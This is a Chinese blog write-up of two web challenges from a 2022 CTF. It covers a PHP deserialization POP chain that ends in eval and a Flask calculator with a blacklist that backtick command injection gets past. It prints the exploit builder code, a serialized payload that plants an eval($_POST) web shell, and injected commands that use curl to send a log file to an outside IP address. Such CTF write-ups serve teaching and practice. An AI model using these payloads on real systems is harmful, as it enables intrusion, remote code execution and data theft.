2022DASCTF X SU 三月春季挑战赛

已于 2022-03-31 18:56:28 修改
阅读量961 收藏 2
点赞数
文章标签: php
于 2022-03-27 23:18:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56059226/article/details/123774410
版权

web


ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

简单的pop链,直接构造出来了,唯一有个坑就是eval后面有个#号,当时没看到折腾了好久,他本意是会注释掉后面执行的语句,不过不影响,闭合一下payload就行:

?><?=system('ls');
<?php

class crow
{
    public $v1;
    public $v2;
    public function __construct()
    {
        $this->v1=new fin();
        $this->v1->f1=new mix();
        $this->v1->f1->m1="?><?=system('ls');";
        //   $this->v1->f1->m1="system('ls /')";
    }
}

class fin
{
    public $f1;
    public function __construct()
    {
        $f1=$this->f1;
    }

}

class what
{
    public $a;

    public function __construct()
    {
        $this->a=new fin();
        $this->a->f1=new crow();
    }
}
class mix
{
    public $m1;

    public function __construct()
    {
        $m1=$this->m1;
    }

}

$a=new fin();
$a->f1=new what();
echo serialize($a);

 或者直接用蚁剑连接,里面改成

?><?=eval(\$_POST[1]);

注意蚁剑的连接密码要换成

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

要用这全部当密码才可以连接成功

calc 

给了原码

# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app = Flask(__name__)


def waf(s):
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag


@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")


@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

f12里面有个这个

 大概意思就是如果python脚本执行的时候有报错就会弹出error:function()

提交的时候会请求/calc路由并提交num参数

回到py原码里面,进入到calc路由后会触发calc函数,接收num参数后,还会拼接到log里面,在经过waf函数,如果没被过滤会先执行eval,再执行system函数

@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

再看看waf

    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']

因为过滤了括号,所以把eval当做突破口有点困难,那多半把目标放在system函数里面,又由于没有禁用反引号,所以说是可以执行的。

直接执行一下`ls`

报错了,因为eval里面执行反引号会报错用井号过掉eval函数就好了传入:123#`ls` 

简单说明一下#注释让eval不会报错后会进入到system函数里面,相当于传入的是

"echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

把一些没用的抛开大概就是

"echo {0}> ./tmp/log.txt".format(num)

传入后相当于是执行了ls然后把 #和ls结果  输入到了/tmp/log.txt里面,写进去后再把数据带出来,由于他过滤了空格,所以用tab键(%09)来代替空格就可以了

传入命令

/calc?num=1%23`curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://139.196.123.120:7777/`

刚开始我想直接传到计算器提交的位置,后来想到传编码的话会先进入到前端,前端过滤又过不了,所以直接传到url上面或者用burp都可以。但是要进入到calc目录下

有回显,现在就是绕过了 ,读一下根目录

/calc?num=1%23`ls%09/`

/calc?num=1%23`curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://139.196.123.120:7777/`

由于过滤了_,用通配符绕过就好了

 /calc?num=1%23`cat%09/Th1s*`

/calc?num=1%23`curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://139.196.123.120:7777/`

flag就出来了 

c1oud..
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
可以独立编译的CWP-SU ximage指令的源代码
05-03
CWP-SU ximage指令是Seismic Unix(SU)软件包中的一个重要组成部分,它主要用于处理地震数据。Seismic Unix是一个广泛使用的开源地震成像和数据分析软件,由科罗拉多矿业学院(CWP,Center for Wave Phenomena)...
su文件用于获取root权限
05-13
在Android系统中,`su` 文件是一个至关重要的组件,它使得用户可以获取到系统的超级用户权限,也就是我们常说的root权限。Root权限是Android系统中的一种高级权限,允许用户访问和修改系统的受保护部分,包括系统...
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2543
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
2022DASCTF X SU 三月春季挑战赛 Web部分 WriteUp
weixin_51804748的博客
04-04 4058
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public.
2022年3月buu月赛dasctf
weixin_51458899的博客
03-27 6017
2022年3月buu月赛dasctf web ezpop <?php class what { public $a; public function __construct(){ $this->a = new fin(); } } class mix{ public $m1; public function __construct(){ $this->m1 = "?><?=system('cat
DASCTF 2022九月赛WEB
weixin_43952190的博客
09-22 766
CTF
2022DASCTF X SU 三月春季挑战赛web部分
qq_52988816的博客
03-28 817
简单写一下
SU转化器2020最新,su版本转换器
05-07
SU转化器2020最新是一款专为解决SketchUp模型版本转换问题的工具。SketchUp,简称SU,是由Trimble Navigation公司开发的一款流行的3D建模软件,广泛应用于建筑设计、室内设计、景观设计等多个领域。SketchUp的不同...
华为光猫SU密码计算器
02-13
华为光猫telnet进入root账户后su提权会产生动态用户名,此软件就是用来解析动态用户名的密码软件。使用起来很方便。
SU1X-开源
05-12
"SU1X-开源"是一个专门针对Windows XP / Vista / Win7操作系统的工具,它的主要目的是简化客户端的网络配置过程,无论是有线还是无线网络。这个工具特别强调大规模部署和高度可定制性,使得它在学术环境或其他需要...
DASCTF x SU 三月wp+复现
一只菜鸡
03-30 619
之前给忘了 已经搭建新站很久了~ 师傅们来找我玩呀 因为还没复现完就先放这里了 复现完再放新站 ezpop 直接得到源码: <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->.
[DASCTF2022]三月月赛WriteUp Web部分全复现
Pysnow's Blog
04-11 3389
Web ezpop ezpop <?php highlight_file(__FILE__); class crow { public $v1; public $v2; function eval() { echo "crow::eval<br>"; echo new $this->v1($this->v2); } public function __invoke() { echo
[2022DASCTF]ezpop
m0_63045593的博客
04-22 1511
[2022DASCTF]ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public
2022DASCTF X SU三月春季挑战赛 web复现
errorr0
04-20 1514
DASCTF
2022DASCTF Apr X FATE 防疫挑战赛 Writeup
末初的CSDN博客
04-25 2535
文章目录SimpleFlow熟悉的猫冰墩墩 废物选手的misc做题记录 SimpleFlow 首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2) 找到对应的参数,然后去掉前面两位字符解码即可 cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E] 得到压缩包密码:PaSsZi
[Misc]2022DASCTF Apr X FATE 防疫挑战赛 wp
mumuzi的博客
04-24 4401
das4
DASCTF
qq_53755216的博客
04-08 790
ez_serialize 题目网址: http://684f47cd-5c9d-41cb-ad29-98d48096cc9a.machine.dasctf.com/ <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $thi
DASCTF Oct X 吉林工师_Misc_复现
M3ng@L的博客
03-02 1435
DASCTF Oct X 吉林工师_Misc_复现WELCOME DASCTFxJlenugiveyourflag闯入魔塔的魔法少女魔法秘文不可以色色魔法信息英语不好的魔法少女彁彁魔法少女的迷音卡比卡比卡比Twinkle Twinkle Starry Night Perference:Perference:Perference: (11条消息) DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp_七月的博客-CSDN博客 WELCOME DASCTFxJlenu keywords:key
2022dasctf x su 三月春季挑战赛
最新发布
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值